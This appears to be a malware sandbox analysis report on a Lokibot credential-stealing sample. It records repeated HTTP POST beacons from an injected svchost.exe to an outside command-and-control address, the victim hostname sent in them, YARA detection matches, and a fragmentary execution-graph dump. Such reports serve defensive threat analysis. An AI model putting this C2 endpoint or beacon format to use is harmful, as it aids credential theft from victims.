                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:41.298198938 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:42.665961981 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:42 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        19 | 192.168.2.4 | 49755 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:43.007633924 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:43.127928019 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:44.435913086 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:44 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        20 | 192.168.2.4 | 49756 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:44.706705093 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:44.826714993 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:46.112834930 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:45 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        21 | 192.168.2.4 | 49757 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:46.379575968 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:46.499557018 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:47.963159084 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:47 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        22 | 192.168.2.4 | 49758 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:48.226660967 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:48.348566055 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:49.835711956 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:49 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        23 | 192.168.2.4 | 49759 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:50.133806944 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:50.256361008 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:54.778409958 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:54 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        24 | 192.168.2.4 | 49760 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:55.053323030 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:55.174547911 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:56.550052881 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:56 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        25 | 192.168.2.4 | 49763 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:56.818681002 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:56.938795090 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:37:58.419599056 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:37:58 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        26 | 192.168.2.4 | 49764 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:37:58.692344904 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:37:58.812352896 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:00.700906992 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:00 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        27 | 192.168.2.4 | 49770 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:38:00.958424091 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:01.082225084 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:02.367278099 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:02 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        28 | 192.168.2.4 | 49776 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:38:02.636234045 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:02.758234978 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:04.200182915 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:03 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        29 | 192.168.2.4 | 49782 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:38:04.457258940 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:04.577450991 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:05.909101963 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:05 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        30 | 192.168.2.4 | 49788 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:38:06.186880112 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:06.307813883 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:07.784981966 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:07 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        31 | 192.168.2.4 | 49789 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:38:08.058146954 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Nov 29, 2024 07:38:08.178167105 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Nov 29, 2024 07:38:12.701245070 CET | 193 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:12 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        32 | 192.168.2.4 | 49805 | 94.156.177.41 | 80 | 3300 | C:\Windows\SysWOW64\svchost.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Nov 29, 2024 07:38:12.960716963 CET | 246 | OUT | POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Timestamp: Nov 29, 2024 07:38:13.081566095 CET, Bytes transferred: 149, Direction: OUT
                        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C
                        Timestamp: Nov 29, 2024 07:38:14.378434896 CET, Bytes transferred: 193, Direction: IN
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.26.1
                        Date: Fri, 29 Nov 2024 06:38:14 GMT
                        Content-Type: text/html; charset=utf-8
                        Connection: close
                        X-Powered-By: PHP/5.4.16
                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                        Data Ascii: File not found.


                        Session ID: 33, Source IP: 192.168.2.4, Source Port: 49806, Destination IP: 94.156.177.41, Destination Port: 80, PID: 3300, Process: C:\Windows\SysWOW64\svchost.exe
                        Timestamp: Nov 29, 2024 07:38:14.644509077 CET, Bytes transferred: 246, Direction: OUT
                        POST /davinci/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 94.156.177.41
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 1A8F59C4
                        Content-Length: 149
                        Connection: close
                        Timestamp: Nov 29, 2024 07:38:14.764600992 CET, Bytes transferred: 149, Direction: OUT
                        Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 33 00 36 00 34 00 33 00 33 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                        Data Ascii: (ckav.rujones364339JONES-PC0FDD42EE188E931437F4FBE2C



                        Target ID:0
                        Start time:01:36:56
                        Start date:29/11/2024
                        Path:C:\Users\user\Desktop\Order84746.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Order84746.exe"
                        Imagebase:0x8e0000
                        File size:532'480 bytes
                        MD5 hash:6E891F3ADBFD415FAE70FF8376014769
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.1678316435.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:01:36:56
                        Start date:29/11/2024
                        Path:C:\Windows\SysWOW64\svchost.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\Order84746.exe"
                        Imagebase:0xfa0000
                        File size:46'504 bytes
                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.2659257287.0000000003621000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                        • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.2658996553.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                        Reputation:high
                        Has exited:true


                          Execution Graph

                          Execution Coverage:3.9%
                          Dynamic/Decrypted Code Coverage:0.5%
                          Signature Coverage:6.3%
                          Total number of Nodes:1999
                          Total number of Limit Nodes:164
8ed645 94672->94860 94674 8e62b2 Mailbox 94675 8ed7f7 48 API calls 94674->94675 94676 8e62c5 94675->94676 94870 8e63fc 94676->94870 94680 8e62df 94681 8e62e9 94680->94681 94682 951c08 94680->94682 94683 900fa7 _W_store_winword 59 API calls 94681->94683 94684 8e63fc 48 API calls 94682->94684 94685 8e62f4 94683->94685 94686 951c1c 94684->94686 94685->94686 94687 8e62fe 94685->94687 94689 8e63fc 48 API calls 94686->94689 94688 900fa7 _W_store_winword 59 API calls 94687->94688 94690 8e6309 94688->94690 94691 951c38 94689->94691 94690->94691 94692 8e6313 94690->94692 94693 8e5374 50 API calls 94691->94693 94694 900fa7 _W_store_winword 59 API calls 94692->94694 94695 951c5d 94693->94695 94696 8e631e 94694->94696 94697 8e63fc 48 API calls 94695->94697 94698 8e635f 94696->94698 94700 951c86 94696->94700 94703 8e63fc 48 API calls 94696->94703 94701 951c69 94697->94701 94699 8e636c 94698->94699 94698->94700 94705 8fc050 48 API calls 94699->94705 94704 8e6eed 48 API calls 94700->94704 94702 8e6eed 48 API calls 94701->94702 94706 951c77 94702->94706 94707 8e6342 94703->94707 94708 951ca8 94704->94708 94710 8e6384 94705->94710 94711 8e63fc 48 API calls 94706->94711 94712 8e6eed 48 API calls 94707->94712 94709 8e63fc 48 API calls 94708->94709 94713 951cb5 94709->94713 94714 8f1b90 48 API calls 94710->94714 94711->94700 94715 8e6350 94712->94715 94713->94713 94719 8e6394 94714->94719 94716 8e63fc 48 API calls 94715->94716 94716->94698 94717 8f1b90 48 API calls 94717->94719 94719->94717 94720 8e63fc 48 API calls 94719->94720 94721 8e63d6 Mailbox 94719->94721 94886 8e6b68 48 API calls 94719->94886 94720->94719 94721->94598 94723 8e40f2 __ftell_nolock 94722->94723 94724 8e410b 94723->94724 94728 95370e _memset 94723->94728 94725 8e660f 49 API calls 94724->94725 94726 8e4114 94725->94726 95514 8e40a7 94726->95514 94731 8e6a63 48 API calls 